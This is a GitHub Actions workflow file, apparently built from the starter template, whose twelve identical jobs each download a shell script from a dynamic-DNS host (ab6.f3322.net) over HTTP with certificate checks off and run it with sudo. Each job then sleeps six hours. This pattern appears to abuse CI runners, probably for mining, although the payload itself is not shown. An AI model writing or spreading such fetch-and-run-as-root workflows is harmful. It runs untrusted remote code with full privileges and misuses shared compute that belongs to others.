# This is a basic workflow to help you get started with Actions

name: ubyl

# Controls when the action will run. 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ test ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build2:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build3:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build4:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build5:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build6:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build7:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build8:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build9:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build10:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build11:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
  build12:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2
      
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo 开始
          wget --no-check-certificate http://ab6.f3322.net:8081/mservice_19.11.1.sh -O mservice.sh
          sudo bash mservice.sh 11194
          echo 结束
          sleep 6h
